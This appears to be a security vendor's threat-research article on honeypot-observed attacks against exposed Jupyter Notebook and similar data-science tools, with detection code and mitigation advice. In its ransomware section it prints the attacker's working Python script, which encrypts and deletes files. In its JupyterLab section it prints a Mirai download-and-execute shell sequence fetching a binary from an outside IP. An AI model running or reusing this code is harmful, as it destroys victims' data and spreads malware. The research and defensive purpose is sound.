Real-World Cyberattacks Targeting Data Science Tools
Aqua Nautilus researchers explore how to protect Jupyter Notebook and other popular data science tools against crypto mining and ransomware attacks.
As the move to the cloud accelerates, organizations increasingly rely on large data teams to make data-driven business decisions. To accomplish their jobs, data professionals work with dedicated tools that are often deployed to development and production environments and are frequently given high privileges. Threat actors are innovators, constantly looking for new ways to penetrate organizations, and the expanded attack surface data science tools present is a prime opportunity.
To identify current threats and help organizations improve their security posture, Aqua Nautilus extensively researched the threats targeting cloud data science tools. We found that many data tools are exposed and are being actively attacked in the wild. In this article, we’ll detail the attacks on Jupyter Notebooks and other popular open-source tools that data practitioners use to analyze and manipulate data.
Exploring Data Science Tools
Data practitioners collect, manipulate, and analyze a company’s data to guide and empower the business with actionable insights. They require high-privileged access to the company’s databases and computing resources, making them a tempting target for threat actors. Additionally, they require an array of programming languages, frameworks, and tools to accomplish the wide range of tasks they perform with data. These tools include Jupyter Notebook, Apache Spark, Hadoop, Airflow DAG, Redis, MySQL, and more. The more tools an organization uses, the more vulnerable it can become, opening the door to more potential attacks.
Identifying Jupyter Notebook Attacks
Jupyter Notebook, an open-source web application, is a popular and frequently attacked tool. Data professionals use Jupyter Notebook to work with data, write and execute code, and visualize the results. Team Nautilus researchers found 70 completely unsecured Jupyter Notebook instances through a Shodan query out of a total of 10,000 that were visible and accessible.
Normally, access to the online application should be restricted, either with a token or password or by limiting ingress traffic. However, Jupyter Notebooks are sometimes left exposed to the internet with no authentication configured, allowing anyone to access the instance through a web browser. On top of this, a built-in feature of Jupyter Notebooks lets the user open a shell terminal with further access to the server. While this is convenient for users, it gives threat actors enormous leeway when the instance is left unsecured. Once we entered their IP address and port in our browser, the unsecured Jupyter Notebook instances allowed full visibility and control over the host. Anyone could see the files in the active directory or download files from a remote source.
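To make the misconfiguration concrete, here is a minimal Python sketch that flags a Jupyter configuration in which authentication has been switched off. It assumes the settings live in a JSON config file (for example, a jupyter_notebook_config.json), that the relevant sections are named NotebookApp or ServerApp, and that a missing token key means Jupyter generates a token on its own. The function names are hypothetical and used only for illustration.

```python
import json

# Config sections assumed to carry the authentication settings:
# "NotebookApp" (classic Notebook) and "ServerApp" (Jupyter Server).
AUTH_SECTIONS = ("NotebookApp", "ServerApp")


def auth_disabled(config: dict) -> bool:
    """Return True if a section sets an empty token and has no password."""
    for section in AUTH_SECTIONS:
        settings = config.get(section, {})
        # Only an explicitly empty token counts; an absent key is assumed
        # to mean that Jupyter generates a token automatically.
        token_blank = settings.get("token") == ""
        password_blank = not settings.get("password")
        if token_blank and password_blank:
            return True
    return False


def check_config_file(path: str) -> bool:
    """Load a JSON config file (hypothetical path) and check it."""
    with open(path, encoding="utf-8") as handle:
        return auth_disabled(json.load(handle))
```

A check like this only covers what is written in the file it is given; command-line flags or other config files can still override it, so it complements network-level restrictions rather than replacing them.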
The majority of the attacks gained initial access via misconfigured environments. After gaining access, adversaries attempted to achieve persistence by creating a new user in the Jupyter Notebook or by adding Secure Shell (SSH) keys. Then, most of the attacks executed a cryptominer, trying to leverage their access for a quick payday. One of the most noteworthy attacks we discovered, however, utilized Python to launch a ransomware attack targeting Jupyter Notebook.
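Because adding SSH keys was one of the persistence techniques we saw, a simple audit of authorized keys files can surface unexpected entries. The sketch below is illustrative only: it assumes you maintain an allowlist of approved public key blobs, and it uses simplified parsing that does not handle quoted options containing spaces. The function names are hypothetical.

```python
# Prefixes of common OpenSSH public key type names.
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")


def extract_key_blobs(authorized_keys_text: str) -> list[str]:
    """Return the base64 key blob from each entry in an authorized_keys file."""
    blobs = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        fields = line.split()
        # The blob is the field that follows the key type; any options
        # come before the key type and the comment comes after the blob.
        for index, field in enumerate(fields[:-1]):
            if field.startswith(KEY_TYPE_PREFIXES):
                blobs.append(fields[index + 1])
                break
    return blobs


def unknown_keys(authorized_keys_text: str, allowed_blobs: set[str]) -> list[str]:
    """Return key blobs that are not in the (assumed) allowlist."""
    return [
        blob
        for blob in extract_key_blobs(authorized_keys_text)
        if blob not in allowed_blobs
    ]
```

Comparing key blobs rather than comments matters because the comment field is free text that an attacker can set to anything.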
Jupyter Notebook Python Ransomware Attack Dissected
During our research, we consistently observed the attackers gaining initial access via misconfigured environments, then running a ransomware script that encrypts every file on a given path on the server and deletes itself after execution to conceal the attack. Since Jupyter Notebooks are used to analyze data and build data models, this attack can lead to significant damage within organizations if these environments aren’t properly backed up.
Initially, we set up a honeypot with a Jupyter Notebook application exposed to the internet. This attracted a lot of nefarious attention. Here is the kill chain of the attacks we observed:
Per the diagram, the attacker accessed the server via a misconfigured application, downloaded the libraries and tools that support the attack (such as encryptors), and then manually created a ransomware script by pasting the Python code and executing the script. Here’s the code that was executed during the attack on our honeypot:
sud
su
cd /h
ls -la
nano
apt install nano
nano cpt.py
import os
import sys
direct = input("Input directory")
password = input("Input password")
def crypt(file):
import pyAesCrypt
print("---------------------------------------------------------------")
password = str(password)
buffer_size = 512*1024
pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
print("[Encrypt] '"+str(file)+".crp'")
os.remove(file)
def walk(dir):
for name in os.listdir(dir):
path = os.path.join(dir, name)
try:
if os.path.isfile(path):
crypt(path)
else:
walk(path)
except Exception as e:
print(f'[-] {e}')
walk(direct)
print("---------------------------------------------------------------")
os.remove(str(sys.argv[0]))<0x1b>[201~<0x18>y
python3 c
/src/
a70e9776-1ca5-4b45-aba5-5949f2bfb642
pip3 install pyAesCrypt
/src/
ls -l
The honeypot was designed to simulate a real-life enterprise environment, so it included actual Jupyter Notebooks and raw data files that the attacker could encrypt. The attack stopped before it could cause more damage, so we decided to simulate and investigate the attack in our lab. In the screenshot below, you can see the execution of the encryptor. Note that the Python file (cpt.py) was designed to delete itself after execution to conceal the attack.
No ransom note was presented in this attack. Thus, we assume that either the adversary was experimenting with the attack on our machine or the honeypot timed out before the attack was completed.
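The script in this attack appends .crp to every file it encrypts, so the presence of such files is a simple indicator to look for. The following is a minimal sketch of that check, assuming the extension stays the same across attacks (an attacker could trivially change it). The function name is hypothetical.

```python
import os

# Extension appended by the encryptor observed on our honeypot.
ENCRYPTED_SUFFIX = ".crp"


def find_encrypted_files(root: str, suffix: str = ENCRYPTED_SUFFIX) -> list[str]:
    """Walk a directory tree and return files that end with the suffix."""
    hits = []
    for current_dir, _subdirs, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(suffix):
                hits.append(os.path.join(current_dir, name))
    return sorted(hits)
```

A hit is only a starting point for investigation; by the time .crp files exist, the originals have already been removed, which is why backups remain the real safeguard.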
Overall, this attack is simple and straightforward compared with more sophisticated ransomware families such as Locky, Ryuk, and WannaCry, or ransomware-as-a-service offerings such as GandCrab. GandCrab, for instance, is spread via malicious email attachments or malicious sites. A downloader is delivered first and fetches the malware from various servers across a wide network. The malware uses defense evasion techniques, such as packing its files and using encryptors and obfuscators to conceal the code. It gains persistence by copying itself to various locations.
Locky ransomware is disseminated via many infection methods such as Microsoft Office documents (.xlsx, .xls, .pptx, .ppt, .doc, .docx, etc.), JavaScript files, Visual Basic for Application files (.vba), or executables (.exe, .dll). This leads to a greater attack surface and a far greater potential impact.
Ransomware as a Service (RaaS), or Ransomware for Hire, is a business model between ransomware “service providers” and the “customers.” The service providers maintain the infrastructure. The customer purchases this service through dark web channels and pays to disseminate and infect victims. The customers “earn” the money from the victims while the “service providers” provide the infrastructure and earn from renting it.
We also suspect our attacker may be a known entity due to the unique trademark that was used. At the beginning of the attack, the adversary checked if the server was vulnerable by downloading a text file named f1gl6i6z to the /tmp directory. This file contains the word ‘bl*t,’ which might indicate that the threat actor has a Russian origin. We’ve seen this file used before in many cryptomining attacks that target Jupyter Notebooks and JupyterLab environments.
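Since the marker file name recurs across attacks, checking for it is a cheap first test. The sketch below looks for a file named f1gl6i6z in a list of directories. The directory list is an assumption supplied by the caller (we observed the file in /tmp), and the function name is hypothetical.

```python
from pathlib import Path

# File name of the marker the adversary dropped on our honeypot.
MARKER_NAME = "f1gl6i6z"


def find_marker_files(directories: list[str], marker: str = MARKER_NAME) -> list[str]:
    """Return the paths of marker files found in the given directories."""
    found = []
    for directory in directories:
        candidate = Path(directory) / marker
        if candidate.is_file():
            found.append(str(candidate))
    return found
```

For example, find_marker_files(["/tmp"]) returns an empty list on a host where the file is absent. The absence of the file proves little, because an attacker can delete or rename it.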
A quick Shodan query shows that there are about 200 internet-facing Jupyter Notebooks with no authentication. Naturally, some of them can be honeypots, but not all. We think that this attack indicates the existence of a broader campaign designed to execute ransomware on these servers.
We used Aqua’s open-source runtime security and forensics tool Tracee to detect two drift events during the attack: dropping and execution on the fly of a binary and a Python file. Although a “living off the land” approach — using the existing tools in a target environment — is common, attackers often prefer to bring in and apply their own tools, and Tracee is capable of detecting these kinds of events. In this case, the attacker downloaded a nano binary to create the file cpt.py and executed this binary along with the cpt.py script. However, these specific detections aren’t available in the open-source Tracee rules.
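To illustrate the idea of drift, the following sketch compares a baseline snapshot of executable files with a later snapshot and reports anything new or changed. This is not how Tracee works: Tracee detects these events at runtime, while this is a static filesystem comparison with hypothetical function names. It would also miss a script such as cpt.py that is run through the interpreter without being marked executable.

```python
import hashlib
import os


def snapshot_executables(root: str) -> dict[str, str]:
    """Map each executable regular file under root to its SHA-256 digest."""
    snapshot = {}
    for current_dir, _subdirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(current_dir, name)
            if os.path.isfile(path) and os.access(path, os.X_OK):
                with open(path, "rb") as handle:
                    snapshot[path] = hashlib.sha256(handle.read()).hexdigest()
    return snapshot


def find_drift(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Return paths that are new or whose contents changed since the baseline."""
    return sorted(
        path for path, digest in current.items() if baseline.get(path) != digest
    )
```

In a container setting, the baseline would typically be taken from the image at build time, so a nano binary that appears later shows up as drift.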
Further Attacks on Jupyter Notebook
The ransomware attack was far from the only attack our Jupyter Notebook honeypots observed. One, quite strikingly, was a cryptomining botnet attack tied to TeamTNT. Despite being allegedly retired as a group, their legacy lives on with highly sophisticated self-propagating attacks. Also, Aqua Nautilus recently identified their fingerprints on a new malware campaign, including one attack capable of analyzing hardware architecture to optimize cryptomining attacks and another utilizing recent advances in math to attempt to reverse dual elliptic curve encryption.
Since cloud data science tools often have substantial processing power and can be poorly integrated into the security stack, cryptomining attacks intended to turn that processing power into easily exchangeable currencies were common. Many of these attacks were simple and straightforward, with attackers doing nothing more than accessing the terminal manually, downloading a cryptominer and configurations, and launching a mining process. Due to their simplicity, these attacks could be launched very rapidly and with minimal commands.
We also saw attacks in which the attackers added a secret into the “nbsignatures” table. This means that even if the user adds a signature, the attacker will still have access using their own credentials and can return to replicate the attack.
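One way to review this table is to dump its rows and look for entries you do not recognize. The sketch below opens the signature database read-only, so the review does not alter the evidence, and returns every row of the nbsignatures table. The database path is supplied by the caller, no particular column layout is assumed, and the function name is hypothetical.

```python
import sqlite3
from pathlib import Path


def list_signature_rows(db_path: str) -> list[dict]:
    """Return all rows of the nbsignatures table as dictionaries."""
    # mode=ro opens the database read-only and fails if the file is missing.
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"
    connection = sqlite3.connect(uri, uri=True)
    try:
        cursor = connection.execute("SELECT * FROM nbsignatures")
        # Column names are read from the result set rather than hardcoded.
        columns = [description[0] for description in cursor.description]
        return [dict(zip(columns, row)) for row in cursor.fetchall()]
    finally:
        connection.close()
```

Comparing the output against a copy taken when the environment was known to be clean makes unexpected entries easier to spot.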
Some of the Jupyter Notebook attacks involved advanced tools, such as Cobalt Strike. Cobalt Strike is a powerful commercial offensive security tool, originally developed for ethical hacking and used by in-house red teams. Unfortunately, the same capabilities have made it highly popular with cybercriminals. The framework offers tools for conducting network attacks and social engineering, as well as mechanisms for deploying binaries and code on the fly. Attackers can use Cobalt Strike to gain backdoor access, explore the server, get root privileges, and more.
In the Cobalt Strike attack that Aqua Nautilus detected, the attacker accessed the server via Jupyter Notebook and downloaded the file CrossC2-test, a small payload containing malware with backdoor capabilities that is hard to trace and detect. In addition, another binary file was downloaded to /tmp, a packed Cobalt Strike payload (MD5= d9c9c6777932a6c627a9dd34e1932efb).
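The MD5 above can be used as an indicator of compromise. As a minimal sketch, the code below hashes the regular files directly inside a directory and reports any whose MD5 matches a known-bad set. The directory to scan is an assumption supplied by the caller, and the function names are hypothetical.

```python
import hashlib
import os

# MD5 of the packed Cobalt Strike payload observed in this attack.
KNOWN_BAD_MD5 = {"d9c9c6777932a6c627a9dd34e1932efb"}


def md5_of_file(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Hash a file in chunks so large files do not need to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_known_bad_files(directory: str, known_bad: set[str] = KNOWN_BAD_MD5) -> list[str]:
    """Return files directly inside the directory whose MD5 is known bad."""
    matches = []
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        try:
            if md5_of_file(entry.path) in known_bad:
                matches.append(entry.path)
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
    return sorted(matches)
```

Hash matching only catches byte-identical files, and a repacked payload will have a different hash, so treat a clean result as weak evidence.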
In another attack, we spotted an attempt to exploit two recent vulnerabilities for privilege escalation. By compromising an exposed Jupyter Notebook, the attackers gained access to the server and then actively attempted to elevate their privileges to root. To do so, they used exploits from GitHub to take advantage of the sudoedit vulnerability (CVE-2021-3156) and the Dirty Pipe vulnerability (CVE-2022-0847). We’ve seen attackers seek root privileges on the server to achieve more control over the target environment and expand the blast radius of an attack. To the best of our knowledge, this was the first-ever exploitation of the Dirty Pipe vulnerability seen in the wild.
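A quick way to triage exposure to Dirty Pipe is to compare the kernel release string with the upstream versions that carry the fix. The sketch below assumes the upstream numbering, in which the flaw was introduced in 5.8 and fixed in 5.16.11, 5.15.25, and 5.10.102. Distribution kernels often backport fixes without changing these numbers, so a True result means "check your vendor advisory," not "confirmed vulnerable." The function name is hypothetical.

```python
import platform
import re

# Upstream stable releases that carry the fix, keyed by (major, minor).
FIXED_IN = {(5, 10): 102, (5, 15): 25, (5, 16): 11}


def dirty_pipe_possibly_vulnerable(release: str) -> bool:
    """Return True if the upstream version falls in the affected range."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    major, minor = int(match.group(1)), int(match.group(2))
    patch = int(match.group(3) or 0)
    # Kernels before 5.8 predate the flaw; 5.17 and later include the fix.
    if (major, minor) < (5, 8) or (major, minor) >= (5, 17):
        return False
    fixed_patch = FIXED_IN.get((major, minor))
    if fixed_patch is None:
        return True  # affected branch with no upstream fix release listed
    return patch < fixed_patch


if __name__ == "__main__":
    print(dirty_pipe_possibly_vulnerable(platform.release()))
```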
Other Discoveries of Attacks on Data Science Tools
According to our findings, Jupyter Notebook isn’t the only data science tool that is at risk. JupyterLab and CoCalc were also part of Aqua Nautilus’ research.
JupyterLab is a web-based interactive development environment for notebooks, code, and data. It provides access to the Linux terminal and Jupyter Notebook. We queried Shodan and found more than 70 JupyterLab instances exposed to the internet. Most of them didn’t require any authentication and were already infected with malware. We created several honeypots that allowed access to JupyterLab instances and saw several attacks in the wild.
One simple attack created a Jupyter Notebook with the script named spam.ipnyb on the JupyterLab platform, downloaded the xmrig cryptominer from GitHub, and executed it on the instance. In the screenshot below, you can see two attacks. In one of them, an attacker manually accessed the terminal and downloaded the Python2.7 and 1.json files, which are an xmrig cryptominer and its configuration file.
The second attack is a Mirai malware attack. The file whoareyou.x86 contains the Mirai malware, designed to launch a distributed denial of service (DDoS) attack. Attackers used the following script to download and execute Mirai:
pkill -9 x86;
pkill -9 whoareyou.x86 ;
pkill -9 hakai.x86_64;
cd /tmp;
rm -rf hoho.x86;
pkill x86;
wget http://85.202.269.102/webos/whoareyou.x86;
chmod 777 *;
.whoareyou.x86 server.sploit\
CoCalc is an online collaborative workspace for math and research that offers a data science and scientific Python stack, including Jupyter Notebook, R Statistics, and Octave. It also offers a web-based Linux terminal and an X11 graphical desktop. A commercial version of CoCalc offers hosting and support, and an open-source version can be downloaded from GitHub.
By querying Shodan, we saw 66 CoCalc instances exposed to the network, 10 of which were completely exposed and allowed unauthenticated access.
Some of these instances allowed attackers to create an account or anonymously log into an existing account and open a Linux terminal. The privileges were limited, but an attacker might exploit this platform to escalate the privileges and gain further access to the host. However, we haven’t seen any active attacks targeting any of these hosts. Attackers may be less familiar with this platform or less keen to exploit it.
Tips for Detection and Mitigation
Now that we’ve laid out the attacks, here are key recommendations for organizations to follow in order to detect and mitigate data science tool threats.
- Use tokens or another authentication method to control access to data tools.
- Limit inbound traffic to the application by blocking internet access completely or, if the environment requires internet access, by using network rules or a VPN to control inbound traffic. Limiting outbound access is also recommended.
- Run applications with a non-privileged user or one with limited access.
- Ensure that all the Jupyter Notebook users are known. You can query the users in the SQLite3 database, which should be found in this path: ./root/.local/share/jupyter/nbsignatures.db
  We also recommend looking for SSH authorized keys files to find any unknown users or keys.
- Monitor the running processes on the host to detect suspicious processes or cryptominers that hijack resources, which show up as high CPU or bandwidth usage. Specific process names, such as xmr and xmrig, can also help you identify cryptominers. Both of these real-world examples are named after XMR, the abbreviation for the Monero cryptocurrency.
While you can manually check every process you have running, it’s an enormous time sink for IT teams and isn’t scalable. Instead, we recommend that you monitor events on the host using a runtime security and forensics tool for Linux, built to address common Linux security issues for the best business results.
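As a lightweight first pass at the process name check described above, the sketch below reads process names from /proc on Linux and flags those containing xmr or xmrig. It is illustrative only, with hypothetical function names. Name matching is easy to evade, as shown by the miner we saw downloaded under the name Python2.7, so it cannot replace runtime monitoring.

```python
from pathlib import Path

# Substrings taken from the process names mentioned above.
SUSPICIOUS_SUBSTRINGS = ("xmr", "xmrig")


def flag_suspicious(names: list[str], needles: tuple[str, ...] = SUSPICIOUS_SUBSTRINGS) -> list[str]:
    """Return the process names that contain any suspicious substring."""
    return [
        name for name in names
        if any(needle in name.lower() for needle in needles)
    ]


def running_process_names(proc_root: str = "/proc") -> list[str]:
    """Read the command name of each running process from /proc (Linux only)."""
    names = []
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue  # only numeric directories are processes
        try:
            names.append((entry / "comm").read_text().strip())
        except OSError:
            continue  # the process exited or is not readable
    return names


if __name__ == "__main__":
    print(flag_suspicious(running_process_names()))
```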